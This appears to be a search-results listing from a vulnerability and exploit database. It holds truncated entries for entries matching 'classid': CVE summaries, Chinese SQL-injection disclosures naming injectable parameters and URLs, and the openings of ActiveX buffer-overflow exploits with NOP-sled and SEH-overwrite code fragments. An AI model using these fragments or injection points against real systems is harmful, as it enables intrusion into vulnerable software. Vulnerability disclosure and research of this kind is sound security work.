70 matches found
CVE-2022-31788
IdeaLMS 2022 allows SQL injection via the IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID= pathname...
CVE2018-8550Poc
这个漏洞属于com组件Unmarshal类型本地权限提升漏洞 复现环境 1. Windows 10 1709 32位操作系统 2. 需要安装声卡或操作系统自带虚拟声卡 3. 编译环境Visual Studio 2013 Poc 分析 原poc作者James Forshaw使用C实现,我一直未复现成功,不过通过原poc的代码我大致明白了漏洞的成因和触发方法,原poc环境是win10 1803...
CVE-2017-17933
cgi/surgeftpmgr.cgi aka the Web Manager interface on TCP port 7021 or 9021 in NetWin SurgeFTP version 23f2 has XSS via the classid, domainid, or username parameter...
CVE-2017-17933
cgi/surgeftpmgr.cgi aka the Web Manager interface on TCP port 7021 or 9021 in NetWin SurgeFTP version 23f2 has XSS via the classid, domainid, or username parameter...
CHM Help Files Deliver Brazilian Banking Trojan
Security researchers are warning of a new spam campaign targeting Brazilian institutions that contain Compiled HTML file attachments that are used to deliver a banking Trojan. Spam messages contain a malicious CHM attachment called “comprovante.chm”, wrote Rodel Mendrez, senior security researche...
SQL injection vulnerability in the newss.htm?classID= parameter of the distance education platform of Shenzhen Tengchuang Network Technology Co.
Tengchuang Internet Distance Education Platform is an online knowledge trading platform centered on real-time interactive online classroom, combining powerful functions such as courseware on-demand, course transaction, online payment, and online examination, etc. for students and teachers in...
SQL Injection Vulnerability in the 'classid' parameter of the mining system of Shenzhen Jishu Communication Co.
Ltd. is a communication enterprise providing communication services and communication products. A SQL injection vulnerability exists in the program mining system of Shenzhen Jishu Communication Co. The lack of filtering of the 'classid' parameter allows an attacker to exploit the vulnerability to...
一采通电子采购系统多处SQL注入漏洞#4
简要描述: 一采通电子采购系统多处SQL注入漏洞4 详细说明: google:inurl:companycglist.aspx?ComId= 1 漏洞存在于 /Plan/TitleShow/ApplyInfo.aspx,参数ApplyID 例如 http://eps.umgg.com.cn/Plan/TitleShow/ApplyInfo.aspx?ApplyID=1 2 漏洞存在于 /Price/AVL/AVLPriceTrendsSQU.aspx,参数classId 例如...
WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow
WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i128; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...
WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow
var arg1="PraveenD"; var arg2=1; var arg3= ""; var arg4="PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i1664; i++ arg3 += "B"; var nseh = "\xeb\x10PD"; //WESPSerialPort.dll0x100104e7 = pop pop ret var seh = "\xe7\x04\x01\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...
WebGate eDVR Manager 2.6.4 - AudioOnlySiteChannel Stack Buffer Overflow
WebGate eDVR Manager 2.6.4 - AudioOnlySiteChannel Stack Buffer Overflow var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i128; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...
X360 VideoPlayer ActiveX Control 2.6 - Full ASLR & DEP Bypass Exploit
Exploit for windows platform in category remote exploits !-- Exploit Title: X360 VideoPlayer ActiveX Control RCE Full ASLR & DEP Bypass Author: Rh0 Date: Jan 30 2015 Affected Software: X360 VideoPlayer ActiveX Control 2.6 VideoPlayer.ocx Vulnerability: Buffer Overflow in Data Section Tested on:...
TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow (PoC)
TRENDnet SecurView Wireless Network Camera TV-IP422WN UltraCamX.ocx Stack BoF Vendor: TRENDnet Product web page: http://www.trendnet.com Affected version: TV-IP422WN/TV-IP422W Summary: SecurView Wireless N Day/Night Pan/Tilt Internet Camera, a powerful dual-codec wireless network camera with the...
Fengcms v1.25 SQL注入漏洞
简要描述: 过滤不严,绕过并注入 详细说明: Template/article.html和Template/articleclass.html中 $classid=$GET‘classid’//直接GET传入 最新推荐 loop M"module"-l"article","wclassid='$classid'&&attribj=1&&status=1;ftitle,html,date;n10;sid,1" $k $v //classid直接带入查询 date'm/d',strtotime$v'date'$v'title' /loop 下面的一样,就省略了...
Microsoft Outlook2000/Express 6.0 Arbitrary Program Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/6923/info Microsoft Outlook and Outlook Express may execute arbitrary programs through objects embedded in HTML email messages. When an email message or newsgroup message is viewed using Outlook, a temporary object is...
Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
No description provided by source. $Id: msvidctlmpeg2.rb 9179 2010-04-30 08:40:19Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of us...
Rising Online Virus Scanner 22.0.0.5 - ActiveX Control DoS (Stack overflow)
No description provided by source. Exploit Title: Rising Online Virus Scanner ActiveX Control DoS Stack overflow Author: wirebonder Software Link: http://www.rising-global.com/products/online-scanner-intro.html Tested on: Windows XP sp3 ProgID: RavOLCtlLib.RavOnline ClassID:...
RichTx32.OCX (TextBox Control 6.0) ActiveX Dos
Exploit for windows platform in category dos / poc Title: RichTx32.OCX TextBox Control 6.0 ActiveX Dos Author: Dmar al3noOoz يارب انصر اخوننا في سوريا Mail : email protected Software Link : http://support.microsoft.com/default.aspx?scid=kb;en-us;838010 Version: 6.00.8169 Tested on: Windows XP...
High-speed Ankang School Site program v3. 1. 1 cookie injection vulnerability-vulnerability warning-the black bar safety net
PS:seems to be oyaya kernel. Use the system notes: 1. The present program consists of extreme well-being and development,the symbolic charge a little Fee for everyone to use! 2. The present system for sharing procedures,the user the freedom to choose whether to use,in use, any problems and losses...
ICONICS WebHMI - ActiveX Stack Overflow
ICONICS WebHMI - ActiveX Stack Overflow , , . .' '. ', . , '. , ., , / / / \ \ ==/ /\ \ / / \ / \ / / | \ \ Y Y \ / /| / \ /||| / / /.-. / /:wq x.0 '=.|w|.=' ='"=. presents.. ICONICS WebHMI ActiveX Stack Overflow Vendor Link: http://www.iconics.com/ PDF:...